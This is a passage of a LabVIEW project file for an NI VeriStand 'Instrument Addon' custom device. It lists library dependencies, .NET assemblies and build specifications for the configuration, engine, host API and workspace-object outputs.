Name="NIVeriStand_DataServices.dll" Type="Document" URL="/&lt;vilib&gt;/NI Veristand/Custom Device API/Data/NIVeriStand_DataServices.dll"/> <Item Name="NIVS Hardware Discovery.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NI VeriStand Hardware Resource Discovery/NIVS Hardware Discovery.lvlib"/> <Item Name="Not Found Dialog.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Not Found Dialog.vi"/> <Item Name="Recursive File List.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/libraryn.llb/Recursive File List.vi"/> <Item Name="ref_Display Template Handler RunPauseStop.ctl" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/ref_Display Template Handler RunPauseStop.ctl"/> <Item Name="Search and Replace Pattern.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Search and Replace Pattern.vi"/> <Item Name="Set Bold Text.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Set Bold Text.vi"/> <Item Name="Set Busy.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/cursorutil.llb/Set Busy.vi"/> <Item Name="Set Cursor (Cursor ID).vi" Type="VI" URL="/&lt;vilib&gt;/Utility/cursorutil.llb/Set Cursor (Cursor ID).vi"/> <Item Name="Set Cursor (Icon Pict).vi" Type="VI" URL="/&lt;vilib&gt;/Utility/cursorutil.llb/Set Cursor (Icon Pict).vi"/> <Item Name="Set Cursor.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/cursorutil.llb/Set Cursor.vi"/> <Item Name="Set String Value.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Set String Value.vi"/> <Item Name="Simple Error Handler.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Simple Error Handler.vi"/> <Item Name="Space Constant.vi" Type="VI" URL="/&lt;vilib&gt;/dlg_ctls.llb/Space Constant.vi"/> <Item Name="sub_Display Template - Polymorphic.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template - Polymorphic.vi"/> <Item Name="sub_Display Template Handler Custom.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Custom.vi"/> <Item Name="sub_Display Template Handler Graph.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Graph.vi"/> <Item Name="sub_Display Template Handler Model Calibration Array.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Model Calibration Array.vi"/> <Item Name="sub_Display Template Handler Model Calibration List.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Model Calibration List.vi"/> <Item Name="sub_Display Template Handler Model Calibration.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Model Calibration.vi"/> <Item Name="sub_Display Template Handler Model Status RunPauseStop.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Model Status RunPauseStop.vi"/> <Item Name="sub_Display Template Handler Numeric.vi" Type="VI" URL="/&lt;vilib&gt;/NI VeriStand/Display Template Support/DisplayTemplateSupport.llb/sub_Display Template Handler Numeric.vi"/> <Item Name="subFile Dialog.vi" Type="VI" URL="/&lt;vilib&gt;/express/express input/FileDialogBlock.llb/subFile Dialog.vi"/> <Item Name="System Directory Type.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/sysdir.llb/System Directory Type.ctl"/> <Item Name="System Exec.vi" Type="VI" URL="/&lt;vilib&gt;/Platform/system.llb/System Exec.vi"/> <Item Name="TagReturnType.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/TagReturnType.ctl"/> <Item Name="Three Button Dialog CORE.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Three Button Dialog CORE.vi"/> <Item Name="Three Button Dialog.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Three Button Dialog.vi"/> <Item Name="Tools_KeyedArray.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/Tools/Keyed Array/Tools_KeyedArray.lvlib"/> <Item Name="Tools_String.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/Tools/String/Tools_String.lvlib"/> <Item Name="Trim Whitespace.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/Trim Whitespace.vi"/> <Item Name="Unset Busy.vi" Type="VI" URL="/&lt;vilib&gt;/Utility/cursorutil.llb/Unset Busy.vi"/> <Item Name="VariantType.lvlib" Type="Library" URL="/&lt;vilib&gt;/Utility/VariantDataType/VariantType.lvlib"/> <Item Name="VS Inline Async API.lvlib" Type="Library" URL="/&lt;vilib&gt;/NI/NIVS Inline Async API/_VS Inline Async API/VS Inline Async API.lvlib"/> <Item Name="whitespace.ctl" Type="VI" URL="/&lt;vilib&gt;/Utility/error.llb/whitespace.ctl"/> </Item> <Item Name="LV Config Read String.vi" Type="VI" URL="/&lt;resource&gt;/dialog/lvconfig.llb/LV Config Read String.vi"/> <Item Name="mscorlib" Type="VI" URL="mscorlib"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand" Type="Document" URL="NationalInstruments.VeriStand"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.ClientAPI" Type="Document" URL="NationalInstruments.VeriStand.ClientAPI"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.SystemDefinitionAPI" Type="Document" URL="NationalInstruments.VeriStand.SystemDefinitionAPI"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.SystemStorage" Type="Document" URL="NationalInstruments.VeriStand.SystemStorage"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="NationalInstruments.VeriStand.SystemStorageUI" Type="Document" URL="NationalInstruments.VeriStand.SystemStorageUI"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="nisyscfg.dll" Type="Document" URL="nisyscfg.dll"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> <Item Name="systemLogging.dll" Type="Document" URL="systemLogging.dll"> <Property Name="NI.PreserveRelativePath" Type="Bool">true</Property> </Item> </Item> <Item Name="Build Specifications" Type="Build"> <Item Name="Configuration Release" Type="Source Distribution"> <Property Name="Bld_buildCacheID" Type="Str">{F7E936A1-C50B-4217-AC2B-A4DA3629CD4B}</Property> <Property Name="Bld_buildSpecName" Type="Str">Configuration Release</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_excludeTypedefs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_preActionVIID" Type="Ref">/My Computer/Utilities/LLB Pre-Build CHM Build.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{E8035317-FDF9-4FC1-9EF0-1450E8CAE472}</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Destination Directory</Property> <Property Name="Destination[0].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Data</Property> <Property Name="Destination[2].destName" Type="Str">Instrument Addon Configuration LLB</Property> <Property Name="Destination[2].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Instrument Addon Configuration.llb</Property> <Property Name="Destination[2].type" Type="Str">LLB</Property> <Property Name="Destination[3].destName" Type="Str">XML Config Location</Property> <Property Name="Destination[3].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME</Property> <Property Name="Destination[4].destName" Type="Str">Glyphs</Property> <Property Name="Destination[4].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Glyphs</Property> <Property Name="Destination[5].destName" Type="Str">Quick Start Documentation</Property> <Property Name="Destination[5].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Quick Start Documentation</Property> <Property Name="Destination[5].preserveHierarchy" Type="Bool">true</Property> <Property Name="DestinationCount" Type="Int">6</Property> <Property Name="Source[0].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[0].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[0].itemID" Type="Str">{C2E71D12-4AA2-4074-8E4F-83442D4BD0F8}</Property> <Property Name="Source[0].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[0].properties[0].value" Type="Bool">false</Property> <Property Name="Source[0].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[0].properties[1].value" Type="Bool">false</Property> <Property Name="Source[0].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[0].properties[2].value" Type="Bool">false</Property> <Property Name="Source[0].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[0].properties[3].value" Type="Bool">false</Property> <Property Name="Source[0].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[0].properties[4].value" Type="Bool">true</Property> <Property Name="Source[0].propertiesCount" Type="Int">5</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[1].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[1].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib/Shared</Property> <Property Name="Source[1].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[1].properties[0].value" Type="Bool">true</Property> <Property Name="Source[1].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[1].properties[1].value" Type="Bool">true</Property> <Property Name="Source[1].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[1].properties[2].value" Type="Bool">false</Property> <Property Name="Source[1].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[1].properties[3].value" Type="Bool">false</Property> <Property Name="Source[1].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[1].properties[4].value" Type="Bool">false</Property> <Property Name="Source[1].propertiesCount" Type="Int">5</Property> <Property Name="Source[1].type" Type="Str">Container</Property> <Property Name="Source[2].destinationIndex" Type="Int">3</Property> <Property Name="Source[2].itemID" Type="Ref">/My Computer/Addon/Custom Device Instrument Addon.xml</Property> <Property Name="Source[2].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[3].destinationIndex" Type="Int">2</Property> <Property Name="Source[3].itemID" Type="Ref">/My Computer/Addon/Instrument Addon System Explorer.lvlib</Property> <Property Name="Source[3].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[3].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[3].type" Type="Str">Library</Property> <Property Name="Source[4].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[4].Container.applyInclusion" Type="Bool">true</Property> <Property Name="Source[4].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[4].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[4].destinationIndex" Type="Int">2</Property> <Property Name="Source[4].itemID" Type="Ref">/My Computer/Addon/Instrument Addon System Explorer.lvlib/System Explorer</Property> <Property Name="Source[4].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[4].properties[0].value" Type="Bool">false</Property> <Property Name="Source[4].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[4].properties[1].value" Type="Bool">true</Property> <Property Name="Source[4].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[4].properties[2].value" Type="Bool">false</Property> <Property Name="Source[4].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[4].properties[3].value" Type="Bool">false</Property> <Property Name="Source[4].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[4].properties[4].value" Type="Bool">false</Property> <Property Name="Source[4].propertiesCount" Type="Int">5</Property> <Property Name="Source[4].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[4].type" Type="Str">Container</Property> <Property Name="Source[5].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[5].Container.applyInclusion" Type="Bool">true</Property> <Property Name="Source[5].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[5].destinationIndex" Type="Int">4</Property> <Property Name="Source[5].itemID" Type="Ref">/My Computer/Addon/Support Files/Glyphs</Property> <Property Name="Source[5].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[5].type" Type="Str">Container</Property> <Property Name="Source[6].destinationIndex" Type="Int">0</Property> <Property Name="Source[6].itemID" Type="Ref">/My Computer/Addon/Support Files/Help/Instrument Addon.chm</Property> <Property Name="Source[6].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[7].destinationIndex" Type="Int">0</Property> <Property Name="Source[7].itemID" Type="Ref">/My Computer/Addon/Support Libraries/Protections.lvlibp</Property> <Property Name="Source[7].preventRename" Type="Bool">true</Property> <Property Name="Source[7].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[8].destinationIndex" Type="Int">0</Property> <Property Name="Source[8].itemID" Type="Ref">/My Computer/Addon/Support Libraries/Protocols.lvlibp</Property> <Property Name="Source[8].preventRename" Type="Bool">true</Property> <Property Name="Source[8].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[9].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[9].Container.applyInclusion" Type="Bool">true</Property> <Property Name="Source[9].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[9].destinationIndex" Type="Int">5</Property> <Property Name="Source[9].itemID" Type="Ref">/My Computer/Addon/Support Files/Quick Start Documentation</Property> <Property Name="Source[9].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[9].type" Type="Str">Container</Property> <Property Name="SourceCount" Type="Int">10</Property> </Item> <Item Name="Engine Release" Type="Source Distribution"> <Property Name="Bld_buildCacheID" Type="Str">{BDB37E78-1B48-4DD8-B51B-9DFE56743A02}</Property> <Property Name="Bld_buildSpecName" Type="Str">Engine Release</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Instrument Addon Engine Windows.llb</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{32214451-43E2-4D3E-92C8-CE819321FAC4}</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Destination Directory</Property> <Property Name="Destination[0].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Instrument Addon Engine Windows.llb</Property> <Property Name="Destination[0].type" Type="Str">LLB</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Data</Property> <Property Name="Destination[2].destName" Type="Str">Custom Device Directory</Property> <Property Name="Destination[2].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows</Property> <Property Name="DestinationCount" Type="Int">3</Property> <Property Name="Source[0].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[0].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[0].itemID" Type="Str">{FE340D14-2784-4D92-A78F-CC2EE0E25671}</Property> <Property Name="Source[0].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[0].properties[0].value" Type="Bool">false</Property> <Property Name="Source[0].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[0].properties[1].value" Type="Bool">false</Property> <Property Name="Source[0].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[0].properties[2].value" Type="Bool">false</Property> <Property Name="Source[0].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[0].properties[3].value" Type="Bool">true</Property> <Property Name="Source[0].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[0].properties[4].value" Type="Bool">true</Property> <Property Name="Source[0].propertiesCount" Type="Int">5</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].destinationIndex" Type="Int">0</Property> <Property Name="Source[1].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Engine.lvlib/RT Driver VI.vi</Property> <Property Name="Source[1].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[1].properties[0].value" Type="Bool">false</Property> <Property Name="Source[1].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[1].properties[1].value" Type="Bool">true</Property> <Property Name="Source[1].properties[2].type" Type="Str">Allow debugging</Property> <Property Name="Source[1].properties[2].value" Type="Bool">false</Property> <Property Name="Source[1].properties[3].type" Type="Str">Run when opened</Property> <Property Name="Source[1].properties[3].value" Type="Bool">false</Property> <Property Name="Source[1].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[1].properties[4].value" Type="Bool">false</Property> <Property Name="Source[1].propertiesCount" Type="Int">5</Property> <Property Name="Source[1].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[1].type" Type="Str">VI</Property> <Property Name="Source[2].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[2].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[2].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Shared.lvlib/Shared</Property> <Property Name="Source[2].properties[0].type" Type="Str">Run when opened</Property> <Property Name="Source[2].properties[0].value" Type="Bool">false</Property> <Property Name="Source[2].properties[1].type" Type="Str">Allow debugging</Property> <Property Name="Source[2].properties[1].value" Type="Bool">false</Property> <Property Name="Source[2].properties[2].type" Type="Str">Auto error handling</Property> <Property Name="Source[2].properties[2].value" Type="Bool">false</Property> <Property Name="Source[2].properties[3].type" Type="Str">Remove front panel</Property> <Property Name="Source[2].properties[3].value" Type="Bool">true</Property> <Property Name="Source[2].properties[4].type" Type="Str">Remove block diagram</Property> <Property Name="Source[2].properties[4].value" Type="Bool">true</Property> <Property Name="Source[2].propertiesCount" Type="Int">5</Property> <Property Name="Source[2].type" Type="Str">Container</Property> <Property Name="Source[3].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[3].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[3].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Engine.lvlib/SubVIs</Property> <Property Name="Source[3].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[3].properties[0].value" Type="Bool">true</Property> <Property Name="Source[3].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[3].properties[1].value" Type="Bool">true</Property> <Property Name="Source[3].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[3].properties[2].value" Type="Bool">false</Property> <Property Name="Source[3].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[3].properties[3].value" Type="Bool">false</Property> <Property Name="Source[3].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[3].properties[4].value" Type="Bool">false</Property> <Property Name="Source[3].propertiesCount" Type="Int">5</Property> <Property Name="Source[3].type" Type="Str">Container</Property> <Property Name="Source[4].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[4].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[4].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Engine.lvlib/Types</Property> <Property Name="Source[4].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[4].properties[0].value" Type="Bool">true</Property> <Property Name="Source[4].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[4].properties[1].value" Type="Bool">true</Property> <Property Name="Source[4].properties[2].type" Type="Str">Allow debugging</Property> <Property Name="Source[4].properties[2].value" Type="Bool">false</Property> <Property Name="Source[4].properties[3].type" Type="Str">Auto error handling</Property> <Property Name="Source[4].properties[3].value" Type="Bool">false</Property> <Property Name="Source[4].properties[4].type" Type="Str">Run when opened</Property> <Property Name="Source[4].properties[4].value" Type="Bool">false</Property> <Property Name="Source[4].propertiesCount" Type="Int">5</Property> <Property Name="Source[4].type" Type="Str">Container</Property> <Property Name="Source[5].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Engine.lvlib/Processes/Instrument Main Engine.vi</Property> <Property Name="Source[5].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[5].properties[0].value" Type="Bool">false</Property> <Property Name="Source[5].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[5].properties[1].value" Type="Bool">true</Property> <Property Name="Source[5].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[5].properties[2].value" Type="Bool">false</Property> <Property Name="Source[5].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[5].properties[3].value" Type="Bool">false</Property> <Property Name="Source[5].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[5].properties[4].value" Type="Bool">false</Property> <Property Name="Source[5].propertiesCount" Type="Int">5</Property> <Property Name="Source[5].type" Type="Str">VI</Property> <Property Name="Source[6].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[6].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[6].destinationIndex" Type="Int">2</Property> <Property Name="Source[6].itemID" Type="Ref">/My Computer/Addon/Support Libraries</Property> <Property Name="Source[6].type" Type="Str">Container</Property> <Property Name="Source[7].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[7].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[7].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[7].itemID" Type="Ref">/My Computer/Addon/Instrument Addon Engine.lvlib/Processes</Property> <Property Name="Source[7].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[7].properties[0].value" Type="Bool">false</Property> <Property Name="Source[7].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[7].properties[1].value" Type="Bool">true</Property> <Property Name="Source[7].properties[2].type" Type="Str">Allow debugging</Property> <Property Name="Source[7].properties[2].value" Type="Bool">false</Property> <Property Name="Source[7].properties[3].type" Type="Str">Run when opened</Property> <Property Name="Source[7].properties[3].value" Type="Bool">false</Property> <Property Name="Source[7].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[7].properties[4].value" Type="Bool">false</Property> <Property Name="Source[7].propertiesCount" Type="Int">5</Property> <Property Name="Source[7].type" Type="Str">Container</Property> <Property Name="Source[8].destinationIndex" Type="Int">0</Property> <Property Name="Source[8].itemID" Type="Ref">/My Computer/Addon/Support Libraries/Protections.lvlibp</Property> <Property Name="Source[8].preventRename" Type="Bool">true</Property> <Property Name="Source[8].sourceInclusion" Type="Str">Include</Property> <Property Name="Source[9].destinationIndex" Type="Int">0</Property> <Property Name="Source[9].itemID" Type="Ref">/My Computer/Addon/Support Libraries/Protocols.lvlibp</Property> <Property Name="Source[9].preventRename" Type="Bool">true</Property> <Property Name="Source[9].sourceInclusion" Type="Str">Include</Property> <Property Name="SourceCount" Type="Int">10</Property> </Item> <Item Name="Host API" Type="Packed Library"> <Property Name="Bld_autoIncrement" Type="Bool">true</Property> <Property Name="Bld_buildCacheID" Type="Str">{10FA82E6-CA69-4EBA-B362-AEAA07291A74}</Property> <Property Name="Bld_buildSpecName" Type="Str">Host API</Property> <Property Name="Bld_excludeInlineSubVIs" Type="Bool">true</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Host Automation API</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_modifyLibraryFile" Type="Bool">true</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{7F7FDA91-FFE5-4844-A4FA-9D8996F5C375}</Property> <Property Name="Bld_version.build" Type="Int">49</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Instrument Host Automation API.lvlibp</Property> <Property Name="Destination[0].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Host Automation API/Instrument Host Automation API.lvlibp</Property> <Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property> <Property Name="Destination[0].type" Type="Str">App</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Custom Devices/NI_AB_PROJECTNAME/Windows/Host Automation API</Property> <Property Name="DestinationCount" Type="Int">2</Property> <Property Name="PackedLib_callersAdapt" Type="Bool">true</Property> <Property Name="Source[0].itemID" Type="Str">{5CE7C627-5D29-4675-A182-EE1098D51B50}</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].destinationIndex" Type="Int">0</Property> <Property Name="Source[1].itemID" Type="Ref">/My Computer/APIs/Instrument Host Automation API.lvlib</Property> <Property Name="Source[1].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[1].Library.atomicCopy" Type="Bool">true</Property> <Property Name="Source[1].Library.LVLIBPtopLevel" Type="Bool">true</Property> <Property Name="Source[1].preventRename" Type="Bool">true</Property> <Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property> <Property Name="Source[1].type" Type="Str">Library</Property> <Property Name="SourceCount" Type="Int">2</Property> <Property Name="TgtF_companyName" Type="Str">NI</Property> <Property Name="TgtF_fileDescription" Type="Str">Host API</Property> <Property Name="TgtF_internalName" Type="Str">Host API</Property> <Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2014 NI</Property> <Property Name="TgtF_productName" Type="Str">Host API</Property> <Property Name="TgtF_targetfileGUID" Type="Str">{1FE83921-0070-47B9-B2B7-B6CCC625D14B}</Property> <Property Name="TgtF_targetfileName" Type="Str">Instrument Host Automation API.lvlibp</Property> </Item> <Item Name="Workspace Object" Type="Source Distribution"> <Property Name="Bld_buildCacheID" Type="Str">{8C2E298A-2CF4-4CC2-8B89-2C7487E002E8}</Property> <Property Name="Bld_buildSpecName" Type="Str">Workspace Object</Property> <Property Name="Bld_excludeLibraryItems" Type="Bool">true</Property> <Property Name="Bld_excludePolymorphicVIs" Type="Bool">true</Property> <Property Name="Bld_excludeTypedefs" Type="Bool">true</Property> <Property Name="Bld_localDestDir" Type="Path">../Built/Display Templates</Property> <Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property> <Property Name="Bld_postActionVIID" Type="Ref">/My Computer/Utilities/Copy .LLB to NI VeriStand dir.vi</Property> <Property Name="Bld_previewCacheID" Type="Str">{C8AB3C33-E20A-44E7-90D7-E2F3637DE2FC}</Property> <Property Name="Bld_version.major" Type="Int">1</Property> <Property Name="Destination[0].destName" Type="Str">Destination Directory</Property> <Property Name="Destination[0].path" Type="Path">../Built/Display Templates</Property> <Property Name="Destination[1].destName" Type="Str">Support Directory</Property> <Property Name="Destination[1].path" Type="Path">../Built/Display Templates/Data</Property> <Property Name="Destination[2].destName" Type="Str">Instrument Addon Workspace LLB</Property> <Property Name="Destination[2].path" Type="Path">../Built/Display Templates/Instrument Workspace Object Support.llb</Property> <Property Name="Destination[2].type" Type="Str">LLB</Property> <Property Name="DestinationCount" Type="Int">3</Property> <Property Name="Source[0].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[0].destinationIndex" Type="Int">2</Property> <Property Name="Source[0].itemID" Type="Str">{F1F98602-19FF-4B55-8FF0-5AA5971474BB}</Property> <Property Name="Source[0].type" Type="Str">Container</Property> <Property Name="Source[1].Container.applyProperties" Type="Bool">true</Property> <Property Name="Source[1].Container.applySaveSettings" Type="Bool">true</Property> <Property Name="Source[1].itemID" Type="Ref"></Property> <Property Name="Source[1].properties[0].type" Type="Str">Remove front panel</Property> <Property Name="Source[1].properties[0].value" Type="Bool">true</Property> <Property Name="Source[1].properties[1].type" Type="Str">Remove block diagram</Property> <Property Name="Source[1].properties[1].value" Type="Bool">true</Property> <Property Name="Source[1].properties[2].type" Type="Str">Run when opened</Property> <Property Name="Source[1].properties[2].value" Type="Bool">false</Property> <Property Name="Source[1].properties[3].type" Type="Str">Allow debugging</Property> <Property Name="Source[1].properties[3].value" Type="Bool">false</Property> <Property Name="Source[1].properties[4].type" Type="Str">Auto error handling</Property> <Property Name="Source[1].properties[4].value" Type="Bool">false</Property> <Property Name="Source[1].propertiesCount" Type="Int">5</Property> <Property Name="Source[1].type" Type="Str">Container</Property> <Property Name="Source[10].destinationIndex" Type="Int">2</Property> <Property Name="Source[10].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace Shared.lvlib</Property> <Property Name="Source[10].Library.allowMissingMembers" Type="Bool">true</Property> <Property Name="Source[10].type" Type="Str">Library</Property> <Property Name="Source[11].Container.applyDestination" Type="Bool">true</Property> <Property Name="Source[11].Container.depDestIndex" Type="Int">0</Property> <Property Name="Source[11].destinationIndex" Type="Int">2</Property> <Property Name="Source[11].itemID" Type="Ref">/My Computer/UIs/Instrument Workspace 